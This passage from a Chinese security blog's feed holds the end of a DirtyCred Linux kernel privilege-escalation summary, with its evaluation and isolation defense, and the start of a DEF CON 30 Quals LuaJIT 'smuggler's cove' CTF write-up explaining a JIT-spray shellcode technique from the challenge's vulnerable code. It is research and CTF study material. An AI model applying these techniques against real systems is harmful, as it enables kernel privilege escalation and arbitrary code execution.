class="line"> argv[<span class="number">4</span>] = <span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 调用 usermode helper</span></span><br><span class="line"> info = <span class="built_in">call_usermodehelper_setup</span>(modprobe_path, argv, envp, GFP_KERNEL,</span><br><span class="line">                <span class="literal">NULL</span>, free_modprobe_argv, <span class="literal">NULL</span>);</span><br><span class="line"> <span class="keyword">if</span> (!info)</span><br><span class="line">     <span class="keyword">goto</span> free_module_name;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">call_usermodehelper_exec</span>(info, wait | UMH_KILLABLE);</span><br><span class="line"></span><br><span class="line">free_module_name:</span><br><span class="line"> <span class="built_in">kfree</span>(module_name);</span><br><span class="line">free_argv:</span><br><span class="line"> <span class="built_in">kfree</span>(argv);</span><br><span class="line">out:</span><br><span class="line"> <span class="keyword">return</span> -ENOMEM;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>内核在<strong>加载内核模块</strong>时，需要<strong>在内核层执行 modprobe 程序</strong>，来<strong>在标准安装驱动路径下搜索目标驱动</strong>。</p></li></ol><h2 id="八、评估">八、评估</h2><h3 id="1-评估环境">1. 评估环境</h3><p>Linux 5.16.15</p><h3 id="2-可利用的内核对象">2. 可利用的内核对象</h3><p><strong>对象中包含 credential 对象</strong>且<strong>可控制该对象在内核堆上的分配时机</strong>。</p><p><img src="/2022/10/dirty-cred/image-20221007101939000.png" alt="image-20221007101939000"></p><p>从上图中可以看到，</p><ol><li><p>几乎每个 generic cache 都<strong>至少有两个</strong>可利用对象</p></li><li><p>credential 在可利用对象中的偏移量有较大差别，而这可以提高 Dirty Cred 的利用成功率</p><blockquote><p>尤其是 OOB 漏洞可覆写的偏移量可能偏差较大。</p></blockquote></li><li><p>有五个可利用对象<strong>所包含的 credential 的相对偏移量为 0</strong>，提高了 Dirty Cred <strong>在内存破坏范围较小情况下</strong>的利用成功率。</p></li></ol><h3 id="3-满足评估条件的-CVE-漏洞">3. 满足评估条件的 CVE 漏洞</h3><p>要求：</p><ul><li>在 2019 年及以后报告的 Linux 内核漏洞</li><li>能够在 Linux 堆上进行堆破坏</li><li>触发无需特定硬件条件支持</li><li>可复现相应内核 panic</li></ul><p><img src="/2022/10/dirty-cred/image-20221007101924928.png" alt="image-20221007101924928"></p><p>从上图中可得知，在所有缓解机制全部启动的情况下，Dirty Cred 的利用成功率为：<strong>16/24</strong>。其中：</p><ol><li>Double Free 的漏洞能全部完成利用</li><li>OOB 中存在一些不能完成利用的 case，有些是因为 OOB write 所在的地方是 virtual memory 而不是 kmalloc‘ed 内存，暂无可利用对象。</li><li>UAF 中一些不能完成利用的 case 是：有些只能 UAF read，不能进行 invalid-write；还有些是能 invalid-write 但是写入的位置不在可利用对象的 credential 字段上。</li></ol><h2 id="九、Dirty-Cred-防护">九、Dirty Cred 防护</h2><p>Dirty Cred 之所以能成功，最核心的是：内核的内存隔离是基于<strong>类型</strong>而不是基于<strong>权限</strong>来做的。</p><p>防护方法其实很简单：将 privileged credentials 与其他 unprivileged credentials 隔离开。</p><p>如何做：使用 <code>vzalloc/kvfree</code> 函数来在 virtual memory 中创建与释放 privileged credentials 内存。这样就能使得 privileged 和 unprivileged 对象所在的 memory cache 是隔离开的。</p><p>之所以使用 virtual memory 来存放 privileged credentials，是因为</p><ol><li>如果是使用两个不同的 kmalloc’ed memory cache，那有可能通过 Linux 内核重用机制来把 privileged credentials 所在内存页与 unprivileged 所在页合并，造成隔离失效。</li><li>虚拟内存区域是内核<strong>动态分配</strong>、<strong>虚拟连续</strong>的内存，驻留在 VMALLOC_START 至 VMALLOC_END 中的内存区域。这就使得虚拟内存区域中的内存永远不会与直接映射的内存区域重叠。</li></ol><blockquote><p>这里顺带提一句 kmalloc 和 vmalloc 所分配内存的性质：</p><ol><li>都是分配的内核内存</li><li>kmalloc 保证分配的内存在<strong>物理地址空间上连续</strong>；vmalloc 保证<strong>虚拟地址空间上连续</strong>（需要配置页表）</li><li>kmalloc 能分配的大小有限，vmalloc 能分配的大小相对较大</li><li>vmalloc 因为要设置页表，自然会慢一点</li></ol></blockquote><p>要被隔离的 credential 结构体为：</p><ol><li>UID 为 <strong>GLOBAL_ROOT_UID</strong> 的 struct cred（privileged credentials）</li><li>打开方式中带有<strong>可写</strong>的 struct file（unprivileged credentials）</li></ol><blockquote><p>之所以要把这两个隔离，个人猜测是这两种类型的结构（GLOBAL_ROOT_UID or writable file）创建的次数相对其他结构（非特权级 UID 或者 只读文件结构）较少。</p></blockquote><p>由于这种隔离是在 credential 创建时所确定的，那如果某个非特权 cred 结构体被原地提权（例如通过 <code>setuid/cap_setuid</code>），那就会造成这种内存隔离形同虚设。鉴于此，可以尝试在 <code>alter_cred_subscribers</code> 函数被执行时，在虚拟内存区域新创建一个特权 cred, 而非在原先 cred 上进行修改。但这种防护方法很依赖 Linux 未来的开发发展，倘若以后 Linux 新开发了一种原地修改 cred 的方式，那么这种防护就无效了，因此这个防护被留待 Future work。</p><p>Dirty Cred 防护的性能评估：</p><p><img src="/2022/10/dirty-cred/image-20221007111610551.png" alt="image-20221007111610551"></p><p>从中可得知绝大部分的性能开销都非常的小（&lt; 3%），不会影响系统的正常使用。但其中 10k File Create 的性能开销达到了 7%，这是因为 vmalloc 的执行速度会比 kmalloc 低很多，因为需要重新进行内存映射等等；而 10k File Delete 的性能开销相对较小一点， 因为 Linux 内核使用 RCU 机制来异步进行文件删除，以提高内核执行速度。</p><blockquote><p>RCU (Read-copy update) 是 Linux内核中的一种<strong>数据同步机制</strong>。</p></blockquote><p>上图评估结果中还出现了“轻微的性能改善”，这个纯粹是实验所产生的噪声，不是真的改善（虽然这个实验重复了多次基准测试）。</p><h2 id="十、参考链接">十、参考链接</h2><ul><li><a href="https://github.com/Markakd/DirtyCred">Markakd/DirtyCred - github</a></li><li><a href="https://zplin.me/papers/DirtyCred.pdf">DirtyCred: Escalating Privilege in Linux Kernel - ACM CCS 2022</a></li><li><a href="https://www.blackhat.com/us-22/briefings/schedule/#cautious-a-new-exploitation-method-no-pipe-but-as-nasty-as-dirty-pipe-27169">Cautious: A New Exploitation Method! No Pipe but as Nasty as Dirty Pipe - Blackhat USA 2022</a></li><li><a href="https://hammertux.github.io/slab-allocator">The Slab Allocator in the Linux kernel - hammertux</a></li><li><a href="https://www.kernel.org/doc/html/latest/filesystems/fuse.html">FUSE - The Linux Kernel documentation</a></li><li><a href="https://www.cnblogs.com/sky-heaven/p/11507094.html">Linux kernel workqueue机制分析【转】 - cnblogs</a></li><li><a href="https://blog.csdn.net/YMY_mine/article/details/81636671">kmalloc()和vmalloc() - CSDN</a></li><li><a href="https://szp2016.github.io/linux/RCU%E6%9C%BA%E5%88%B6/">Linux RCU机制 - szp2016 github page</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;Linux Dirty Cred 是一种基于 Dirty Pipe 漏洞所创新出来的新型&lt;strong&gt;漏洞利用方式&lt;/strong&gt;。通过 Dirty Cred 的这种利用流程，其他位于 &lt;strong&gt;Linux 内核&lt;/strong&gt;中的一些&lt;strong&gt;内存漏洞&lt;/strong&gt;，在对其进行漏洞利用的过程里，可以转换为&lt;strong&gt;逻辑漏洞&lt;/strong&gt;，来&lt;strong&gt;绕过当前所有的内核缓解机制&lt;/strong&gt;（包括 CFI 控制流完整性保护）。&lt;/p&gt;
&lt;p&gt;Dirty Cred 的核心利用思路是&lt;strong&gt;使用高权限 credential 对象来交换低权限 credential 对象&lt;/strong&gt;，从而达到提权的目的。该论文目前已中 CCS 2022 &amp;amp; Black Hat USA 2022，属实是一个比较有趣的思路。&lt;/p&gt;</summary>
    
    
    
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
    <category term="linux" scheme="https://kiprey.github.io/tags/linux/"/>
    
  </entry>
  
  <entry>
    <title>Defcon-30-Quals smuggler&#39;s cove 复盘笔记</title>
    <link href="https://kiprey.github.io/2022/08/defcon30quals_smugglers_cove/"/>
    <id>https://kiprey.github.io/2022/08/defcon30quals_smugglers_cove/</id>
    <published>2022-08-29T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.978Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>这里将记录着本人复盘 Defcon 30 Quals 中 <code>smuggler's cove</code> 的复盘笔记。</p><p>本题是一道 luaJIT 的 pwn 题。</p><span id="more"></span><h2 id="二、环境配置">二、环境配置</h2><p>首先，从提供的 libluajit 文件中获取其版本号：</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220829215234730.png" alt="image-20220829215234730"></p><p>之后下载源码切换版本开始编译：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 下载源码</span></span><br><span class="line">git <span class="built_in">clone</span> git@github.com:LuaJIT/LuaJIT.git</span><br><span class="line"><span class="comment"># 进入 LuaJIT 文件夹</span></span><br><span class="line"><span class="built_in">cd</span> LuaJIT</span><br><span class="line"><span class="comment"># 切换版本</span></span><br><span class="line">git checkout v2.1.0-beta3</span><br><span class="line"><span class="comment"># 手动修改 LuaJIT/src/Makefile， 使得编译时带有调试信息</span></span><br><span class="line"><span class="comment"># 编译</span></span><br><span class="line">make -j `<span class="built_in">nproc</span>`</span><br><span class="line"><span class="comment"># 退出 LuaJIT 文件夹</span></span><br><span class="line"><span class="built_in">cd</span> ..</span><br><span class="line"><span class="comment"># 编译，链接时附带刚编译出来的 libluajit.so</span></span><br><span class="line">gcc cove.c -g3 -ggdb3 -o mycove -I LuaJIT/src -L ./LuaJIT/src/ -l luajit</span><br><span class="line"><span class="comment"># 给编译出的 libluajit 改个名字</span></span><br><span class="line"><span class="built_in">ln</span> -s /root/cove/LuaJIT/src/libluajit.so /root/cove/LuaJIT/src/libluajit-5.1.so.2</span><br><span class="line"><span class="comment"># 指定库路径并执行</span></span><br><span class="line">LD_LIBRARY_PATH=/root/cove/LuaJIT/src ./mycove</span><br><span class="line"></span><br><span class="line"><span class="comment"># 如果要执行提供程序本身，则使用以下指令</span></span><br><span class="line">LD_LIBRARY_PATH=. ./cove exp.lua</span><br></pre></td></tr></table></figure><h2 id="三、漏洞点">三、漏洞点</h2><p>题目主要给出了两个源码文件。一个是 <code>dig_up_the_loot.c</code>，该源码所编译出来的可执行文件是用来提供 flag 的，只有当使用特定参数执行该二进制文件时 flag 才会输出：</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830110450663.png" alt="image-20220830110450663"></p><p>再一个源码文件就是调用 LuaJIT 库的主源码文件 <code>cove.c</code>。该源码中的内容大致如下几点：</p><ul><li><p>读入 lua 文件，其中该 lua 文件大小最大不可超过 433 字节。</p></li><li><p>设置 luaJIT 配置，并<strong>禁用 JIT 全局变量的暴露</strong>，防止用户直接设置或修改 JIT 属性：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">set_jit_settings</span><span class="params">(lua_State* L)</span> &#123;</span><br><span class="line">    luaL_dostring(L,</span><br><span class="line">        <span class="string">&quot;jit.opt.start(&#x27;3&#x27;);&quot;</span></span><br><span class="line">        <span class="string">&quot;jit.opt.start(&#x27;hotloop=1&#x27;);&quot;</span></span><br><span class="line">    );</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">init_lua</span><span class="params">(lua_State* L)</span> &#123;</span><br><span class="line">    <span class="comment">// Init JIT lib</span></span><br><span class="line">    lua_pushcfunction(L, luaopen_jit);</span><br><span class="line">    lua_pushstring(L, LUA_JITLIBNAME);</span><br><span class="line">    lua_call(L, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line">    set_jit_settings(L);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//set jit = nil;</span></span><br><span class="line">    lua_pushnil(L);</span><br><span class="line">    lua_setglobal(L, <span class="string">&quot;jit&quot;</span>);</span><br><span class="line">    lua_pop(L, <span class="number">1</span>);</span><br><span class="line">    ...</span><br></pre></td></tr></table></figure></li><li><p>注册 print 函数，用于输出信息：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">print</span><span class="params">(lua_State* L)</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (lua_gettop(L) &lt; <span class="number">1</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> luaL_error(L, <span class="string">&quot;expecting at least 1 arguments&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">const</span> <span class="type">char</span>* s = lua_tostring(L, <span class="number">1</span>);</span><br><span class="line">    <span class="built_in">puts</span>(s);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>最重要的一个操作。注册 lua 函数 <code>cargo</code>，该函数实际调用 C 函数 <code>debug_jit</code>。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">GCtrace* <span class="title function_">getTrace</span><span class="params">(lua_State* L, <span class="type">uint8_t</span> index)</span> &#123;</span><br><span class="line">    jit_State* js = L2J(L);</span><br><span class="line">    <span class="keyword">if</span> (index &gt;= js-&gt;sizetrace)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">return</span> (GCtrace*)gcref(js-&gt;trace[index]);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">debug_jit</span><span class="params">(lua_State* L)</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (lua_gettop(L) != <span class="number">2</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> luaL_error(L, <span class="string">&quot;expecting exactly 1 arguments&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    luaL_checktype(L, <span class="number">1</span>, LUA_TFUNCTION);</span><br><span class="line"></span><br><span class="line">    <span class="type">const</span> GCfunc* v = lua_topointer(L, <span class="number">1</span>);</span><br><span class="line">    <span class="keyword">if</span> (!isluafunc(v)) &#123;</span><br><span class="line">        <span class="keyword">return</span> luaL_error(L, <span class="string">&quot;expecting lua function&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">uint8_t</span> offset = lua_tointeger(L, <span class="number">2</span>);</span><br><span class="line">    <span class="type">uint8_t</span>* bytecode = mref(v-&gt;l.pc, <span class="type">void</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">uint8_t</span> op = bytecode[<span class="number">0</span>];</span><br><span class="line">    <span class="type">uint8_t</span> index = bytecode[<span class="number">2</span>];</span><br><span class="line"></span><br><span class="line">    GCtrace* t = getTrace(L, index);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!t || !t-&gt;mcode || !t-&gt;szmcode) &#123;</span><br><span class="line">        <span class="keyword">return</span> luaL_error(L, <span class="string">&quot;Blimey! There is no cargo in this ship!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;INSPECTION: This ship&#x27;s JIT cargo was found to be %p\n&quot;</span>, t-&gt;mcode);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (offset != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (offset &gt;= t-&gt;szmcode - <span class="number">1</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> luaL_error(L, <span class="string">&quot;Avast! Offset too large!&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        t-&gt;mcode += offset;</span><br><span class="line">        t-&gt;szmcode -= offset;</span><br><span class="line"></span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;... yarr let ye apply a secret offset, cargo is now %p ...\n&quot;</span>, t-&gt;mcode);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><p>注册的 lua 函数 <code>cargo</code> 要求传入参数必须分别为<strong>函数类型</strong>和<strong>整型类型</strong>。从代码中可以得知，当 lua 调用 <code>cargo</code> 函数后，lua 解释器会先<strong>寻找所传入 lua 函数的 JIT 相关结构体</strong>，并<strong>修改该 JIT 后所执行机器码的起始偏移量</strong>。被修改的属性 <code>GCtrace::mcode</code> 和 <code>GCtrace::szmcode</code> 分别是编译后机器码的起始位置和偏移量：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Trace object. */</span></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">GCtrace</span> &#123;</span></span><br><span class="line">  ...</span><br><span class="line">  MSize szmcode;  <span class="comment">/* Size of machine code. */</span></span><br><span class="line">  MCode *mcode;   <span class="comment">/* Start of machine code. */</span></span><br><span class="line">  ...</span><br><span class="line">&#125; GCtrace;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>因此，如果可以<strong>用立即数精心构造一段 JIT 后的机器码</strong>，再<strong>修改 JIT 代码起始位置</strong>，那么控制流就会<strong>将精心准备的立即数识别为指令执行</strong>，这样一来就可以成功执行 shellcode。</p><p>这种做法也被称之为 <strong>JIT Spray</strong>。</p><p>注意到 LuaJIT 设置了一段 jit 的配置：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">set_jit_settings</span><span class="params">(lua_State* L)</span> &#123;</span><br><span class="line">    luaL_dostring(L,</span><br><span class="line">        <span class="string">&quot;jit.opt.start(&#x27;3&#x27;);&quot;</span></span><br><span class="line">        <span class="string">&quot;jit.opt.start(&#x27;hotloop=1&#x27;);&quot;</span></span><br><span class="line">    );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>其中两行 lua 代码都调用了 lua 中的<code>jit.opt.start()</code>函数，该函数的实现位于 <code>LuaJIT/src/lib_jit.c:512</code> 处：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* jit.opt.start(flags...) */</span></span><br><span class="line">LJLIB_CF(jit_opt_start)</span><br><span class="line">&#123;</span><br><span class="line">  jit_State *J = L2J(L);</span><br><span class="line">  <span class="type">int</span> nargs = (<span class="type">int</span>)(L-&gt;top - L-&gt;base);</span><br><span class="line">  <span class="keyword">if</span> (nargs == <span class="number">0</span>) &#123;</span><br><span class="line">    J-&gt;flags = (J-&gt;flags &amp; ~JIT_F_OPT_MASK) | JIT_F_OPT_DEFAULT;</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">1</span>; i &lt;= nargs; i++) &#123;</span><br><span class="line">      <span class="type">const</span> <span class="type">char</span> *str = strdata(lj_lib_checkstr(L, i));</span><br><span class="line">      <span class="keyword">if</span> (!jitopt_level(J, str) &amp;&amp;</span><br><span class="line">    !jitopt_flag(J, str) &amp;&amp;</span><br><span class="line">    !jitopt_param(J, str))</span><br><span class="line">  lj_err_callerv(L, LJ_ERR_JITOPT, str);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>lua 两次调用 <code>jit.opt.start</code> 函数，分别设置了：</p><ul><li><p><code>jit.opt.start('3')</code>：进入 <code>jitopt_level</code>，设置优化等级为 3（最高）</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Optimization levels set a fixed combination of flags. */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> JIT_F_OPT_0 0</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> JIT_F_OPT_1 (JIT_F_OPT_FOLD|JIT_F_OPT_CSE|JIT_F_OPT_DCE)</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> JIT_F_OPT_2 (JIT_F_OPT_1|JIT_F_OPT_NARROW|JIT_F_OPT_LOOP)</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> JIT_F_OPT_3 (JIT_F_OPT_2|\</span></span><br><span class="line"><span class="meta">  JIT_F_OPT_FWD|JIT_F_OPT_DSE|JIT_F_OPT_ABC|JIT_F_OPT_SINK|JIT_F_OPT_FUSE)</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> JIT_F_OPT_DEFAULT JIT_F_OPT_3</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/* Parse optimization level. */</span></span><br><span class="line"><span class="type">static</span> <span class="type">int</span> <span class="title function_">jitopt_level</span><span class="params">(jit_State *J, <span class="type">const</span> <span class="type">char</span> *str)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">if</span> (str[<span class="number">0</span>] &gt;= <span class="string">&#x27;0&#x27;</span> &amp;&amp; str[<span class="number">0</span>] &lt;= <span class="string">&#x27;9&#x27;</span> &amp;&amp; str[<span class="number">1</span>] == <span class="string">&#x27;\0&#x27;</span>) &#123;</span><br><span class="line">    <span class="type">uint32_t</span> flags;</span><br><span class="line">    <span class="keyword">if</span> (str[<span class="number">0</span>] == <span class="string">&#x27;0&#x27;</span>) flags = JIT_F_OPT_0;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (str[<span class="number">0</span>] == <span class="string">&#x27;1&#x27;</span>) flags = JIT_F_OPT_1;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (str[<span class="number">0</span>] == <span class="string">&#x27;2&#x27;</span>) flags = JIT_F_OPT_2;</span><br><span class="line">    <span class="comment">// 这里！</span></span><br><span class="line">    <span class="keyword">else</span> flags = JIT_F_OPT_3;</span><br><span class="line">    J-&gt;flags = (J-&gt;flags &amp; ~JIT_F_OPT_MASK) | flags;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;  <span class="comment">/* Ok. */</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;  <span class="comment">/* No match. */</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>jit.opt.start('hotloop=1')</code>：初始化 hotcount table。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Parse optimization parameter. */</span></span><br><span class="line"><span class="type">static</span> <span class="type">int</span> <span class="title function_">jitopt_param</span><span class="params">(jit_State *J, <span class="type">const</span> <span class="type">char</span> *str)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">const</span> <span class="type">char</span> *lst = JIT_P_STRING;</span><br><span class="line">  <span class="type">int</span> i;</span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; JIT_P__MAX; i++) &#123;</span><br><span class="line">    <span class="type">size_t</span> len = *(<span class="type">const</span> <span class="type">uint8_t</span> *)lst;</span><br><span class="line">    lua_assert(len != <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">strncmp</span>(str, lst+<span class="number">1</span>, len) == <span class="number">0</span> &amp;&amp; str[len] == <span class="string">&#x27;=&#x27;</span>) &#123;</span><br><span class="line">      <span class="type">int32_t</span> n = <span class="number">0</span>;</span><br><span class="line">      <span class="type">const</span> <span class="type">char</span> *p = &amp;str[len+<span class="number">1</span>];</span><br><span class="line">      <span class="keyword">while</span> (*p &gt;= <span class="string">&#x27;0&#x27;</span> &amp;&amp; *p &lt;= <span class="string">&#x27;9&#x27;</span>)</span><br><span class="line">  n = n*<span class="number">10</span> + (*p++ - <span class="string">&#x27;0&#x27;</span>);</span><br><span class="line">      <span class="keyword">if</span> (*p) <span class="keyword">return</span> <span class="number">0</span>;  <span class="comment">/* Malformed number. */</span></span><br><span class="line">      <span class="comment">// 1. 控制流进入此处，保存参数</span></span><br><span class="line">      J-&gt;param[i] = n;</span><br><span class="line">      <span class="comment">// 2. hotloop 判断</span></span><br><span class="line">      <span class="keyword">if</span> (i == JIT_P_hotloop)</span><br><span class="line">    <span class="comment">// 3. 调用该函数执行初始化操作</span></span><br><span class="line">  lj_dispatch_init_hotcount(J2G(J));</span><br><span class="line">      <span class="keyword">return</span> <span class="number">1</span>;  <span class="comment">/* Ok. */</span></span><br><span class="line">    &#125;</span><br><span class="line">    lst += <span class="number">1</span>+len;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;  <span class="comment">/* No match. */</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">if</span> LJ_HASJIT</span></span><br><span class="line"><span class="comment">/* Initialize hotcount table. */</span></span><br><span class="line"><span class="type">void</span> <span class="title function_">lj_dispatch_init_hotcount</span><span class="params">(global_State *g)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int32_t</span> hotloop = G2J(g)-&gt;param[JIT_P_hotloop];</span><br><span class="line">  HotCount start = (HotCount)(hotloop*HOTCOUNT_LOOP - <span class="number">1</span>);</span><br><span class="line">  HotCount *hotcount = G2GG(g)-&gt;hotcount;</span><br><span class="line">  <span class="type">uint32_t</span> i;</span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; HOTCOUNT_SIZE; i++)</span><br><span class="line">    hotcount[i] = start;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">#<span 